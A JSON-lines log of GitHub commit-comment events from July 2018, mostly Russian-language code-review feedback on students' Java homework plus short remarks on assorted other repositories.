{"id":"8034369853","type":"CommitCommentEvent","actor":{"login":"rreeve"},"repo":{"name":"GetScatter/ScatterWebExtension"},"payload":{"comment":{"id":29875774,"position":null,"line":null,"path":null,"commit_id":"52d41761913c211f15be6246e72d0bd47bad730d","created_at":"2018-07-29T17:51:03Z","updated_at":"2018-07-29T17:51:03Z","author_association":"NONE","body":"What has happened to the Firefox extension?"}},"created_at":"2018-07-29T17:51:03Z"}
{"id":"8034370551","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875775,"position":64,"line":64,"path":"src/homeTasks/lesson9/task2/Student.java","commit_id":"8833a6792816d3e7c9cb197723c8a847d11668ee","created_at":"2018-07-29T17:51:32Z","updated_at":"2018-07-29T17:51:32Z","author_association":"NONE","body":"зачем два раза вызывать сравнение по firstName?"}},"created_at":"2018-07-29T17:51:32Z"}
{"id":"8034370731","type":"CommitCommentEvent","actor":{"login":"tps2015gh"},"repo":{"name":"tps2015gh/js_ui_builder"},"payload":{"comment":{"id":29875777,"position":null,"line":null,"path":null,"commit_id":"b5e78cb55ca906f3c85f206bf7ff9442f02e4fe3","created_at":"2018-07-29T17:51:41Z","updated_at":"2018-07-29T17:51:41Z","author_association":"OWNER","body":"This code HTML Static is OK for display Shape and Text .\r\nAnd Easy for maintenance . "}},"created_at":"2018-07-29T17:51:41Z"}
{"id":"8034370795","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875779,"position":11,"line":11,"path":"src/homeTasks/lesson9/task2/StudentDemo.java","commit_id":"8833a6792816d3e7c9cb197723c8a847d11668ee","created_at":"2018-07-29T17:51:43Z","updated_at":"2018-07-29T17:51:43Z","author_association":"NONE","body":"не делать отступов в первой строчке метода"}},"created_at":"2018-07-29T17:51:43Z"}
{"id":"8034371056","type":"CommitCommentEvent","actor":{"login":"Pgsnikable"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875781,"position":null,"line":null,"path":null,"commit_id":"c5a3c8c2abc10251398cf31dbdf2dcbc1bcdae98","created_at":"2018-07-29T17:51:54Z","updated_at":"2018-07-29T17:51:54Z","author_association":"OWNER","body":"в самом верху под OpenFigures"}},"created_at":"2018-07-29T17:51:54Z"}
{"id":"8034371286","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875782,"position":34,"line":34,"path":"src/homeTasks/lesson9/task2/StudentDemo.java","commit_id":"8833a6792816d3e7c9cb197723c8a847d11668ee","created_at":"2018-07-29T17:52:04Z","updated_at":"2018-07-29T17:52:04Z","author_association":"NONE","body":"то же самое, все в утилитные методы выносим, никакого функционала в main, только тестирование"}},"created_at":"2018-07-29T17:52:04Z"}
{"id":"8034371560","type":"CommitCommentEvent","actor":{"login":"gvreuls"},"repo":{"name":"gvreuls/Stockfish"},"payload":{"comment":{"id":29875783,"position":null,"line":null,"path":null,"commit_id":"6c4f168655bb5129f64098528731f9fa0199a9ff","created_at":"2018-07-29T17:52:15Z","updated_at":"2018-07-29T17:52:15Z","author_association":"OWNER","body":"This patch just makes the LTO process parallel so it should result in the same optimization as when built on a single core , but I can merge in current master if that's helpful?"}},"created_at":"2018-07-29T17:52:15Z"}
{"id":"8034371753","type":"CommitCommentEvent","actor":{"login":"CFTheMaster"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29875784,"position":null,"line":null,"path":null,"commit_id":"b55d716eee660ad0443ba6276e9190f36d4d588e","created_at":"2018-07-29T17:52:24Z","updated_at":"2018-07-29T17:52:24Z","author_association":"NONE","body":"That's no good"}},"created_at":"2018-07-29T17:52:24Z"}
{"id":"8034372159","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875785,"position":41,"line":41,"path":"src/homeTasks/lesson9/task2/StudentDemo.java","commit_id":"8833a6792816d3e7c9cb197723c8a847d11668ee","created_at":"2018-07-29T17:52:40Z","updated_at":"2018-07-29T17:52:40Z","author_association":"NONE","body":"как-то сложно ты сделал, зачем тебе ходить туда-сюда "}},"created_at":"2018-07-29T17:52:40Z"}
{"id":"8034372585","type":"CommitCommentEvent","actor":{"login":"typecampo"},"repo":{"name":"umuccmsc/todo"},"payload":{"comment":{"id":29875786,"position":30,"line":30,"path":"listView.js","commit_id":"606349c5538aff93e2534a5721ff255218d356fd","created_at":"2018-07-29T17:53:00Z","updated_at":"2018-07-29T17:53:00Z","author_association":"COLLABORATOR","body":"Your killing me dude. We already have list add functions. "}},"created_at":"2018-07-29T17:53:00Z"}
{"id":"8034372690","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875787,"position":45,"line":45,"path":"src/homeTasks/lesson9/task2/StudentDemo.java","commit_id":"8833a6792816d3e7c9cb197723c8a847d11668ee","created_at":"2018-07-29T17:53:05Z","updated_at":"2018-07-29T17:53:05Z","author_association":"NONE","body":"функция имеет две обязанности - вывод на консоль и нахождениие максимальной оценки"}},"created_at":"2018-07-29T17:53:05Z"}
{"id":"8034373081","type":"CommitCommentEvent","actor":{"login":"TheLastZombie"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875788,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T17:53:24Z","updated_at":"2018-07-29T17:53:24Z","author_association":"OWNER","body":"ich bann dich gleich von der repo"}},"created_at":"2018-07-29T17:53:24Z"}
{"id":"8034373105","type":"CommitCommentEvent","actor":{"login":"Pgsnikable"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29875789,"position":64,"line":64,"path":"src/homeTasks/lesson9/task2/Student.java","commit_id":"8833a6792816d3e7c9cb197723c8a847d11668ee","created_at":"2018-07-29T17:53:24Z","updated_at":"2018-07-29T17:53:24Z","author_association":"OWNER","body":"сразу сортировка по firstName и если равно то сортирую по secondName"}},"created_at":"2018-07-29T17:53:24Z"}
{"id":"8034373862","type":"CommitCommentEvent","actor":{"login":"typecampo"},"repo":{"name":"umuccmsc/todo"},"payload":{"comment":{"id":29875791,"position":1,"line":1,"path":"listView.js","commit_id":"606349c5538aff93e2534a5721ff255218d356fd","created_at":"2018-07-29T17:54:00Z","updated_at":"2018-07-29T17:54:00Z","author_association":"COLLABORATOR","body":"Already have this as well."}},"created_at":"2018-07-29T17:54:00Z"}
{"id":"8034374290","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29875793,"position":3,"line":3,"path":"src/homeWork/hw6/Point.java","commit_id":"7300fea92e8a41e33405038067cd491c5159ac60","created_at":"2018-07-29T17:54:17Z","updated_at":"2018-07-29T17:54:17Z","author_association":"NONE","body":"отступ между классом и его полями"}},"created_at":"2018-07-29T17:54:17Z"}
{"id":"8034374415","type":"CommitCommentEvent","actor":{"login":"andrygreen777"},"repo":{"name":"kambala-decapitator/MacMiddleMouseAutoScroll"},"payload":{"comment":{"id":29875794,"position":2,"line":2,"path":"MacMiddleMouseAutoScroll/Base.lproj/MainMenu.xib","commit_id":"b35d8068c8a24f570f977132562347805cb09ecb","created_at":"2018-07-29T17:54:23Z","updated_at":"2018-07-29T17:54:23Z","author_association":"NONE","body":"K"}},"created_at":"2018-07-29T17:54:23Z"}
{"id":"8034374965","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29875796,"position":21,"line":21,"path":"src/homeWork/hw6/Rectangle.java","commit_id":"7300fea92e8a41e33405038067cd491c5159ac60","created_at":"2018-07-29T17:54:47Z","updated_at":"2018-07-29T17:54:47Z","author_association":"NONE","body":"просто у одной точки вызываешь метод дистанс и передаешь другую - вот тебе и диагональ"}},"created_at":"2018-07-29T17:54:47Z"}
{"id":"8034375044","type":"CommitCommentEvent","actor":{"login":"andrygreen777"},"repo":{"name":"kambala-decapitator/MacMiddleMouseAutoScroll"},"payload":{"comment":{"id":29875797,"position":12,"line":12,"path":"MacMiddleMouseAutoScroll/main.m","commit_id":"b35d8068c8a24f570f977132562347805cb09ecb","created_at":"2018-07-29T17:54:52Z","updated_at":"2018-07-29T17:54:52Z","author_association":"NONE","body":"Bbhj"}},"created_at":"2018-07-29T17:54:52Z"}
{"id":"8034375133","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29875798,"position":30,"line":30,"path":"src/homeWork/hw6/Rectangle.java","commit_id":"7300fea92e8a41e33405038067cd491c5159ac60","created_at":"2018-07-29T17:54:57Z","updated_at":"2018-07-29T17:54:57Z","author_association":"NONE","body":"зачем куча оступов в методе?"}},"created_at":"2018-07-29T17:54:57Z"}
{"id":"8034376069","type":"CommitCommentEvent","actor":{"login":"zpincus"},"repo":{"name":"zplab/elegant"},"payload":{"comment":{"id":29875801,"position":50,"line":467,"path":"elegant/worm_data.py","commit_id":"2764dc3563ba3616eea8ccf5b9c38a3a625bb75c","created_at":"2018-07-29T17:55:34Z","updated_at":"2018-07-29T17:55:34Z","author_association":"CONTRIBUTOR","body":"ehhh, a little redundancy / one-stop-shopping isn't terrible. I'll add docs for the filters, and extend the docs about what the function is doing."}},"created_at":"2018-07-29T17:55:34Z"}
{"id":"8034376325","type":"CommitCommentEvent","actor":{"login":"zpincus"},"repo":{"name":"zplab/elegant"},"payload":{"comment":{"id":29875803,"position":108,"line":589,"path":"elegant/worm_data.py","commit_id":"2764dc3563ba3616eea8ccf5b9c38a3a625bb75c","created_at":"2018-07-29T17:55:46Z","updated_at":"2018-07-29T17:55:46Z","author_association":"CONTRIBUTOR","body":"mentioned above, but a good idea to do so here too"}},"created_at":"2018-07-29T17:55:46Z"}
{"id":"8034376642","type":"CommitCommentEvent","actor":{"login":"andrygreen777"},"repo":{"name":"kambala-decapitator/MacMiddleMouseAutoScroll"},"payload":{"comment":{"id":29875811,"position":12,"line":12,"path":"MacMiddleMouseAutoScroll/main.m","commit_id":"b35d8068c8a24f570f977132562347805cb09ecb","created_at":"2018-07-29T17:55:59Z","updated_at":"2018-07-29T17:55:59Z","author_association":"NONE","body":"Gghh"}},"created_at":"2018-07-29T17:55:59Z"}
{"id":"8034376908","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29875812,"position":23,"line":23,"path":"src/by/rost/jd01_9/ArrListReplace.java","commit_id":"aecdc720a9e3a003aa98196e8e4e9e7aaa8ba11d","created_at":"2018-07-29T17:56:10Z","updated_at":"2018-07-29T17:56:10Z","author_association":"NONE","body":"неправильно пишешь комменты, читай код конвешен, так написано как это делать"}},"created_at":"2018-07-29T17:56:10Z"}
{"id":"8034377126","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29875813,"position":27,"line":27,"path":"src/by/rost/jd01_9/ArrListReplace.java","commit_id":"aecdc720a9e3a003aa98196e8e4e9e7aaa8ba11d","created_at":"2018-07-29T17:56:20Z","updated_at":"2018-07-29T17:56:20Z","author_association":"NONE","body":"никакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T17:56:20Z"}
{"id":"8034377669","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29875814,"position":8,"line":8,"path":"src/by/rost/jd01_9/ArrListReplace.java","commit_id":"aecdc720a9e3a003aa98196e8e4e9e7aaa8ba11d","created_at":"2018-07-29T17:56:46Z","updated_at":"2018-07-29T17:56:46Z","author_association":"NONE","body":"программировать на уровне интерфейсов, а не реализации, поэтому просто List<String>"}},"created_at":"2018-07-29T17:56:46Z"}
{"id":"8034377878","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29875818,"position":31,"line":31,"path":"src/by/rost/jd01_9/ArrListReplace.java","commit_id":"aecdc720a9e3a003aa98196e8e4e9e7aaa8ba11d","created_at":"2018-07-29T17:56:55Z","updated_at":"2018-07-29T17:56:55Z","author_association":"NONE","body":"в методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T17:56:55Z"}
{"id":"8034378179","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29875819,"position":3,"line":3,"path":"src/by/rost/jd01_9/Student.java","commit_id":"aecdc720a9e3a003aa98196e8e4e9e7aaa8ba11d","created_at":"2018-07-29T17:57:09Z","updated_at":"2018-07-29T17:57:09Z","author_association":"NONE","body":"отступ между классом и полями"}},"created_at":"2018-07-29T17:57:09Z"}
{"id":"8034378393","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29875821,"position":5,"line":5,"path":"src/by/rost/jd01_9/StudentMain.java","commit_id":"aecdc720a9e3a003aa98196e8e4e9e7aaa8ba11d","created_at":"2018-07-29T17:57:19Z","updated_at":"2018-07-29T17:57:19Z","author_association":"NONE","body":"отступ между классом и методом"}},"created_at":"2018-07-29T17:57:19Z"}
{"id":"8034378669","type":"CommitCommentEvent","actor":{"login":"nichtdasleo"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875822,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T17:57:32Z","updated_at":"2018-07-29T17:57:32Z","author_association":"NONE","body":"oida\r\n"}},"created_at":"2018-07-29T17:57:32Z"}
{"id":"8034378720","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29875823,"position":30,"line":30,"path":"src/by/rost/jd01_9/StudentMain.java","commit_id":"aecdc720a9e3a003aa98196e8e4e9e7aaa8ba11d","created_at":"2018-07-29T17:57:35Z","updated_at":"2018-07-29T17:57:35Z","author_association":"NONE","body":"то же самое - выносим в утилитный класс"}},"created_at":"2018-07-29T17:57:35Z"}
{"id":"8034379011","type":"CommitCommentEvent","actor":{"login":"AyiSoli"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29875825,"position":null,"line":null,"path":null,"commit_id":"d2186b3db61a9d4dc2d4a6211573790d9e34bf58","created_at":"2018-07-29T17:57:47Z","updated_at":"2018-07-29T17:57:47Z","author_association":"NONE","body":"Oh my. \r\n\r\nThe commit that put the ball straight into Bitcoin Cash's playing ground. \r\n\r\nWell done shooting yourself in the foot, blockstream core. "}},"created_at":"2018-07-29T17:57:47Z"}
{"id":"8034379036","type":"CommitCommentEvent","actor":{"login":"nichtdasleo"},"repo":{"name":"TheLastZombie/ich_iel"},"payload":{"comment":{"id":29875826,"position":null,"line":null,"path":null,"commit_id":"3a74b069b2e3da3d12cb9c69b32a00164a2fb3a3","created_at":"2018-07-29T17:57:49Z","updated_at":"2018-07-29T17:57:49Z","author_association":"NONE","body":"petition um roesch die repo wegzunehmen "}},"created_at":"2018-07-29T17:57:49Z"}
{"id":"8034379181","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29875827,"position":43,"line":43,"path":"src/by/rost/jd01_9/StudentMain.java","commit_id":"aecdc720a9e3a003aa98196e8e4e9e7aaa8ba11d","created_at":"2018-07-29T17:57:55Z","updated_at":"2018-07-29T17:57:55Z","author_association":"NONE","body":"метод с двумя обязанностями, и вывод на консоль и находит студента"}},"created_at":"2018-07-29T17:57:55Z"}
{"id":"8034380862","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875831,"position":6,"line":6,"path":"src/GeometricFigures/Circle.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T17:59:15Z","updated_at":"2018-07-29T17:59:15Z","author_association":"NONE","body":"если хочешь сделать константу, то делай ее public static final, да и потом, такая константа есть в классе Math, изучаем API"}},"created_at":"2018-07-29T17:59:15Z"}
{"id":"8034381187","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875832,"position":3,"line":3,"path":"src/GeometricFigures/Circle.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T17:59:29Z","updated_at":"2018-07-29T17:59:29Z","author_association":"NONE","body":"никаких названий классов и интерфейсов во множественном числе"}},"created_at":"2018-07-29T17:59:29Z"}
{"id":"8034381614","type":"CommitCommentEvent","actor":{"login":"pizzapim"},"repo":{"name":"pizzapim/woordjes"},"payload":{"comment":{"id":29875833,"position":null,"line":null,"path":null,"commit_id":"6b15eb3813621040240780c4df34f8830355bed2","created_at":"2018-07-29T17:59:47Z","updated_at":"2018-07-29T17:59:47Z","author_association":"OWNER","body":"closes #3 "}},"created_at":"2018-07-29T17:59:47Z"}
{"id":"8034383097","type":"CommitCommentEvent","actor":{"login":"AnsabShohab"},"repo":{"name":"Roboy/ss18_xylophone_playing"},"payload":{"comment":{"id":29875847,"position":null,"line":null,"path":null,"commit_id":"51cd83664e58ef7a4316bb0eafb90a3e57095666","created_at":"2018-07-29T18:00:37Z","updated_at":"2018-07-29T18:00:37Z","author_association":"CONTRIBUTOR","body":"Added my own work"}},"created_at":"2018-07-29T18:00:37Z"}
{"id":"8034383315","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875848,"position":22,"line":22,"path":"src/GeometricFigures/Circle.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:00:47Z","updated_at":"2018-07-29T18:00:47Z","author_association":"NONE","body":"вот видишь, из-за того, что неверно написани интерфейс, приходится вот такие методы костыльные добавлять"}},"created_at":"2018-07-29T18:00:47Z"}
{"id":"8034383819","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875856,"position":12,"line":12,"path":"src/GeometricFigures/GeometricFigures.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:01:05Z","updated_at":"2018-07-29T18:01:05Z","author_association":"NONE","body":"опять же никакого вывода на консоль, метод возвращает true-false"}},"created_at":"2018-07-29T18:01:05Z"}
{"id":"8034384074","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875857,"position":12,"line":12,"path":"src/GeometricFigures/GeometricFigures.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:01:14Z","updated_at":"2018-07-29T18:01:14Z","author_association":"NONE","body":"и второе - где скобочки в else?)"}},"created_at":"2018-07-29T18:01:14Z"}
{"id":"8034384097","type":"CommitCommentEvent","actor":{"login":"3rd-Eden"},"repo":{"name":"unshiftio/url-parse"},"payload":{"comment":{"id":29875858,"position":37,"line":37,"path":"SECURITY.md","commit_id":"d7b582ec1243e8024e60ac0b62d2569c939ef5de","created_at":"2018-07-29T18:01:14Z","updated_at":"2018-07-29T18:01:14Z","author_association":"MEMBER","body":"Right, I just copy and pasted this from the reported issue. I can change it, and add a security section to the README and warn people to not bluntly accept user-input as valid URL's.\r\n"}},"created_at":"2018-07-29T18:01:14Z"}
{"id":"8034384781","type":"CommitCommentEvent","actor":{"login":"lepon01"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29875863,"position":null,"line":null,"path":null,"commit_id":"b55d716eee660ad0443ba6276e9190f36d4d588e","created_at":"2018-07-29T18:01:44Z","updated_at":"2018-07-29T18:01:44Z","author_association":"MEMBER","body":"That's no good"}},"created_at":"2018-07-29T18:01:44Z"}
{"id":"8034384939","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"awakening95/pcap_test-TCP_parcer"},"payload":{"comment":{"id":29875865,"position":77,"line":77,"path":"main.cpp","commit_id":"c5b50ff27903437d042a69813ac02da8b20ceb02","created_at":"2018-07-29T18:01:50Z","updated_at":"2018-07-29T18:01:50Z","author_association":"NONE","body":"dataLength를 구할 때와 아래 TCP Data의 위치를 구할 때 사용되어 지는 TCP Header의 ㄱ"}},"created_at":"2018-07-29T18:01:50Z"}
{"id":"8034385037","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875867,"position":10,"line":10,"path":"src/GeometricFigures/GeometricFigures.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:01:54Z","updated_at":"2018-07-29T18:01:54Z","author_association":"NONE","body":"площать не так сравнивается, надо было получать ее через метод square, который должен был возвращать ее, а не писать в консоль"}},"created_at":"2018-07-29T18:01:54Z"}
{"id":"8034385383","type":"CommitCommentEvent","actor":{"login":"whyang0808"},"repo":{"name":"whyang0808/learning-css"},"payload":{"comment":{"id":29875871,"position":null,"line":null,"path":null,"commit_id":"14f4895daba4d6ff186a523ce6b9256472c1cb76","created_at":"2018-07-29T18:02:08Z","updated_at":"2018-07-29T18:02:08Z","author_association":"OWNER","body":"Recommended to use `a {}` and `a.active {}` which will produce the same result, reasons: we can't write overly complicated and hard to understand rules, also from a performance perspective, css code has to be parsed and applied, it's harder to check than simply go through all the positive cases from top to bottom. So, use it with cautions but there can be a situation where it allows you to achieve exactly what you want to achieve. "}},"created_at":"2018-07-29T18:02:08Z"}
{"id":"8034385554","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875872,"position":11,"line":11,"path":"src/GeometricFigures/GeometricFigures.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:02:15Z","updated_at":"2018-07-29T18:02:15Z","author_association":"NONE","body":"ну и на будущее повторюсь, что объекты не сравниваются на ==, только примитивные типы и енамы"}},"created_at":"2018-07-29T18:02:15Z"}
{"id":"8034385820","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875873,"position":17,"line":17,"path":"src/GeometricFigures/GeometricFigures.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:02:25Z","updated_at":"2018-07-29T18:02:25Z","author_association":"NONE","body":"зачем столько оступов в конце класса?"}},"created_at":"2018-07-29T18:02:25Z"}
{"id":"8034385981","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875874,"position":3,"line":3,"path":"src/GeometricFigures/Point.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:02:32Z","updated_at":"2018-07-29T18:02:32Z","author_association":"NONE","body":"отступ между классом и полями"}},"created_at":"2018-07-29T18:02:32Z"}
{"id":"8034386239","type":"CommitCommentEvent","actor":{"login":"jhwohlgemuth"},"repo":{"name":"omahajs/generator-omaha"},"payload":{"comment":{"id":29875875,"position":null,"line":null,"path":null,"commit_id":"ffb8d644cb5c0bf462610ec5af77d2e0b2fa2622","created_at":"2018-07-29T18:02:44Z","updated_at":"2018-07-29T18:02:44Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Sort scaffolded package.json values](https://trello.com/c/bPq4xaMt/191-sort-scaffolded-packagejson-values)"}},"created_at":"2018-07-29T18:02:44Z"}
{"id":"8034386366","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875876,"position":32,"line":32,"path":"src/GeometricFigures/Point.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:02:50Z","updated_at":"2018-07-29T18:02:50Z","author_association":"NONE","body":"зачем все к int приводить, если все равно double возвращаешь?"}},"created_at":"2018-07-29T18:02:50Z"}
{"id":"8034386519","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875877,"position":34,"line":34,"path":"src/GeometricFigures/Point.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:02:57Z","updated_at":"2018-07-29T18:02:57Z","author_association":"NONE","body":"код не отформатирован"}},"created_at":"2018-07-29T18:02:57Z"}
{"id":"8034386845","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875878,"position":6,"line":6,"path":"src/GeometricFigures/Rectangle.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:03:10Z","updated_at":"2018-07-29T18:03:10Z","author_association":"NONE","body":"private полям в классах!"}},"created_at":"2018-07-29T18:03:10Z"}
{"id":"8034386965","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"awakening95/pcap_test-TCP_parcer"},"payload":{"comment":{"id":29875879,"position":94,"line":87,"path":"main.cpp","commit_id":"c5b50ff27903437d042a69813ac02da8b20ceb02","created_at":"2018-07-29T18:03:15Z","updated_at":"2018-07-29T18:03:15Z","author_association":"NONE","body":"and? \"&&\"가 아니고?"}},"created_at":"2018-07-29T18:03:15Z"}
{"id":"8034387401","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875881,"position":46,"line":46,"path":"src/GeometricFigures/Rectangle.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:03:31Z","updated_at":"2018-07-29T18:03:31Z","author_association":"NONE","body":"совсем не хочешь форматировать классы"}},"created_at":"2018-07-29T18:03:31Z"}
{"id":"8034387975","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875883,"position":3,"line":3,"path":"src/GeometricFigures/ShapeUtils.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:03:52Z","updated_at":"2018-07-29T18:03:52Z","author_association":"NONE","body":"утилитный класс final и private конструктор"}},"created_at":"2018-07-29T18:03:52Z"}
{"id":"8034388502","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875884,"position":4,"line":4,"path":"src/GeometricFigures/ShapeUtils.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:04:13Z","updated_at":"2018-07-29T18:04:13Z","author_association":"NONE","body":"должен был возвращать true false, даже сигнатура метода не верна :("}},"created_at":"2018-07-29T18:04:13Z"}
{"id":"8034388974","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875885,"position":10,"line":10,"path":"src/GeometricFigures/Triangle.java","commit_id":"e27e27fe1cf330f1a0cfb18f6fc9e1f24babfc94","created_at":"2018-07-29T18:04:36Z","updated_at":"2018-07-29T18:04:36Z","author_association":"NONE","body":"избегать модификатора доступа по умолчанию!"}},"created_at":"2018-07-29T18:04:36Z"}
{"id":"8034389538","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875886,"position":29,"line":29,"path":"src/Homework7/HW9/Homework9Task1.java","commit_id":"20030ff3b1cc489a6e13d7b0559eb5be1159f4a5","created_at":"2018-07-29T18:05:01Z","updated_at":"2018-07-29T18:05:01Z","author_association":"NONE","body":"никакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T18:05:01Z"}
{"id":"8034389703","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875887,"position":35,"line":35,"path":"src/Homework7/HW9/Homework9Task1.java","commit_id":"20030ff3b1cc489a6e13d7b0559eb5be1159f4a5","created_at":"2018-07-29T18:05:09Z","updated_at":"2018-07-29T18:05:09Z","author_association":"NONE","body":"в методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T18:05:09Z"}
{"id":"8034390871","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29875892,"position":9,"line":9,"path":"src/Homework7/HW9/Homework9Task2Students/FullNameComparatorOfStudents.java","commit_id":"20030ff3b1cc489a6e13d7b0559eb5be1159f4a5","created_at":"2018-07-29T18:05:58Z","updated_at":"2018-07-29T18:05:58Z","author_association":"NONE","body":"не делать конкотанацию строк! если хочешь сравнивать по двум полям, то и напиши два компаратора и из первого вызывай второй"}},"created_at":"2018-07-29T18:05:58Z"}
